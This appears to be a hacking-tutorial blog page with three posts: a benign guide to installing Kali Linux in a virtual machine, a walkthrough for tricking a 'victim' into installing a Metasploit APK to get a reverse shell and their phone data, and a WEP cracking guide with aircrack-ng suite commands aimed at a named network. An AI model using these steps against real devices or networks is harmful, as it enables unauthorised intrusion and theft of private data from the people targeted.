Whirling dropdown menu | Script Tutorials
Showing posts with label kali. Show all posts
Showing posts with label kali. Show all posts

Thursday, 24 September 2015

How To Install Kali Linux In Virtual Machine

1 : click on create new virtual machine
create new virtual machine
create new virtual machine
2 : choose ISO
choose kali linux ISO
choose ISO
3 : Select Guest Operating System
select guest operating system
select guest operating system
4 : Set name and location 
kali-linux4
5 : Set disk space ( 20 GB is good enough, minimum 12 GB to work smoother )
kali-linux-5
5 : Review the hardware configuration and start the virtual machine 
kali linux install guide
Select Graphical Install
6 :  Select Graphical Install go through normal language and timezone host-name selection etc
Set your “root” password and don’t forget it
set root password and dont forget it
set root password and don’t forget it
7 : Disk Partition  ( if you are installing freshly without any dual boot then simply use guided and use full virtual disk )
use full virtual disk
use full virtual disk
8: Select hard-drive and select all-in-one  ( for new users ) or if you don’t know just choose all in one 
use full virtual disk
use full virtual disk
9 :  click on finish partitioning and write changes to disk  , choose yes to write 
kali-linux-17
kali-linux-18
10 : wait until installer finish copying files setting system

kali-linux-19
11 :  set network mirror and set boot-loader ( very important )
mirror
kali-linux-21
12 : after installation restart and login with username ” root ” and password ( what you set at step 6 )
kali-linux-23
kali-linux-24
kali linux

Video Tutorial



Exploit Android Devices using Metasploit - Kali Linux

Requirements:

1. Kali Linux / Backtrack 5 (Having MSF)
2. Android Phone ( Jelly Beans - I am Using Samsung S3)
3. Common Wireless Network ( Using Hotspot)

I am not gona take much time hence will do it fast in simple steps. So lets go.
Step 1: Open Your Kali terminal and type the following command.


Step 2: After pressing the enter key, just type ls for listing the files on same directory. And you will see app.apk file.


Step 3: Now use the exploit i.e exploit/multi/handler , set the respective payload and after setting lhost and lport just type exploit to trigger the exploit.


Step 4: Now send the .apk file we just created to victim, it will be having an M icon showing Metasploit icon on it. As user tries to install it you on attacker machine i.e Kali Linux in our case will get the reverse connection.


Step 5: Now as you can see in below image we got the shell of the Android phone and can have access to its data. If the phone is rooted then you can even get Call Logs, SMS and other data stored in the internal storage space.





VIDEO TUTORIAL



Wifi Hack: Crack WEP Passwords

   
  1. Open up a Terminal window.
  2. Enter: airmon-ng
  3. Note down the interface on which you want to start the monitoring. In my case it is wlan0 so I will be using wlan0Kali Tutorials - WEP Crack Hack
  4. Enter: airmon-ng start wlan0 If the result looks like this: then your card is in monitor mode. Kali Tutorials - WEP Crack Hack
  5. Note down the monitoring interface’s name (“monitor mode enabled on mon0“). In my case it is mon0 so I will be using mon0.
  6. Enter: airodump-ng mon0 Kali Tutorials - WEP Crack Hack
  7. My target is “mtnl” which is using WEP encryption and authentication. Wifi “mtnl” is working on channel 4 and BSSID (or bssid) is 0C:D2:B5:03:43:68. I will be using this information. Enter: airodump-ng –w mtnl-org –c 4 –bssid 0C:D2:B5:03:43:68 mon0 Kali Tutorials - WEP Crack Hack
  8. After about 15,000 packets have been captured, enter: aircrack-ng mtnl-org-01.cap to start cracking the WEP password. Kali Tutorials - WEP Crack Hack

                                    This tutorial is for Educational Purposes Only